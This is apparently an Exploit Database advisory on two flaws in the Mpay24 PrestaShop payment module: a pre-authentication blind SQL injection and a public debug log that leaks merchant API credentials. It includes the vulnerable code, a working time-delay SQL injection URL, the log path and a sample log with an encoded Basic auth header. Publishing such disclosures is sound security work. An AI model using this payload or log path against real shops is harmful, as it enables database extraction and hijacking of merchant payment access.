Mpay24 PrestaShop Payment Module 1.5 – Multiple Vulnerabilities

• Exploit Database
• 16 阅读

• 作者： Wireghoul
  日期： 2014-09-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34586/

• Mpay24 PrestaShop Payment Module Multiple Vulnerabilities
  
   - · Affected Vendor: Mpay24
   - · Affected Software: Mpay24 Payment Module
   - · Affected Version: 1.5 and earlier
   - · Issue Type: SQL injection and information disclosure
   - · Notification Date: 10 February 2014
   - · Release Date: 03 September 2014
   - · Discovered by: Eldar Marcussen
   - · Issue status: Patch available
  
  Summary
  
  BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified
  two high impact vulnerabilities in the Mpay24 payment module for the
  Prestashop e-commerce solution.
  
  “Mpay24 is the online-payment platform for e- and m-commerce combines
  frequently used and innovative payment systems in one single interface”. [
  www.mpay24.com]
  
  “Prestashop is the free ecommerce solution to start your online business
  and start selling online. Build an online store for free with Prestashop.” [
  www.prestashop.com]
  Pre-Authentication Blind SQL Injection Requires
  
  Mpay24 payment module present on the website.
  CVE identifier
  
  CVE-2014-2008
  Description
  
  The Mpay24 plugin version 1.5 and earlier does not sufficiently filter or
  escape user supplied data used in database queries resulting in SQL
  injection vulnerabilities.
  
  The following blind SQL injection vulnerability is caused by user supplied
  data being used directly in a database query, as evidenced by the offending
  code:
  
   confirm.php:12:Db::getInstance()->Execute("
  
  confirm.php:13:UPDATE `"._DB_PREFIX_."mpay24_order` SET
  
  confirm.php:14:`MPAYTID` = ".$_REQUEST['MPAYTID'].",
  
  confirm.php:15:`STATUS` = '".$_REQUEST['STATUS']."'
  
  confirm.php:16:WHERE `TID` = '".$_REQUEST['TID']."'
  
  confirm.php:17:");
  Impact
  
  Using this vulnerability, BAE Systems was able to extract information
  directly from the database, bypassing any restrictions that may be enforced
  by the application.
  
  
  Proof of Concept
  
  The following URL introduces an artificial delay in the page response time
  which can be used by an attacker to extract data from the database:
  
  
  http://target/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
  Recommendation
  
  Use prepared statements to ensure the structure of the database query
  remains intact.
  Pre-Authentication Information Disclosure Requires
  
  Mpay24 configured with debug enabled (default value until version 1.6).
  CVE identifier
  
  CVE-2014-2009
  Description
  
  The Mpay24 plugin logs raw curl requests and other debugging information to
  the payment gateway by default. This log file is publicly accessible and
  contains information valuable to an attacker, including the base64 encoded
  credentials used by the merchant to access the Mpay24 API.
  Impact
  
  Using this vulnerability, BAE Systems was able to obtain Mpay24 API
  credentials and the local path of the Prestashop installation. The attacker
  can use the API credentials to hijack the merchants API access and leverage
  the local path disclosure with other exploits.
  Proof of Concept
  
  URL: http://target/path/modulesmapy24/api/curllog.log
  
   * About to connect() to test.mpay24.com port 443 (#0)
  
  * Trying 213.164.23.169...
  
  * connected
  
  * Connected to test.mpay24.com (213.164.23.169) port 443 (#0)
  
  * successfully set certificate verify locations:
  
  * CAfile: /var/www/prestashop/modules/mpay24/api/cacert.pem
  
  CApath: /etc/ssl/certs
  
  * SSL connection using DHE-RSA-AES256-GCM-SHA384
  
  * Server certificate:
  
  *subject: OU=Domain Control Validated; OU=Provided by EUNETIC GmbH;
  OU=EuropeanSSL Single; CN=test.mpay24.com
  
  *start date: 2013-05-13 00:00:00 GMT
  
  *expire date: 2015-05-13 23:59:59 GMT
  
  *subjectAltName: test.mpay24.com matched
  
  *issuer: C=DE; O=EUNETIC GmbH; CN=EuropeanSSL Server CA
  
  *SSL certificate verify ok.
  
  * Server auth using Basic with user 'u91234'
  
  > POST /app/bin/etpproxy_v15 HTTP/1.1
  
  Authorization: Basic dTkxMjM0OlNPQVAxMjM=
  
  User-Agent: mPAY24 PHP API $Rev: 5522 $ ($Date:: 2013-06-24 #$)
  
  Host: test.mpay24.com
  
  Accept: */*
  
  Content-Length: 423
  
  Content-Type: application/x-www-form-urlencoded
  
  
  
  * upload completely sent off: 423 out of 423 bytes
  
  * additional stuff not fine transfer.c:1037: 0 0
  
  * HTTP 1.1 or later with persistent connection, pipelining supported
  
  < HTTP/1.1 401 Authorization Required
  
  < Date: Sun, 09 Feb 2014 21:04:21 GMT
  
  < Server: Apache
  
  * Authentication problem. Ignoring this.
  
  < WWW-Authenticate: Basic realm="mPAY24 WebService"
  
  < Content-Length: 401
  
  < Content-Type: text/html; charset=iso-8859-1
  
  <
  
  * Connection #0 to host test.mpay24.com left intact
  
  * Closing connection #0
  Recommendation
  
  Restrict access to webpages containing sensitive functionality or data to
  authenticated users.
  End User Recommendation
  
  Update your Mpay24 plugin to version 1.6 or later.
  Response Timeline
  
   - 10/02/2014 – Vendor notified
   - 13/02/2014 – Patch available through GitHub
   - 19/02/2014 – CVE identifiers assigned
  
  03/09/2014 – Advisory released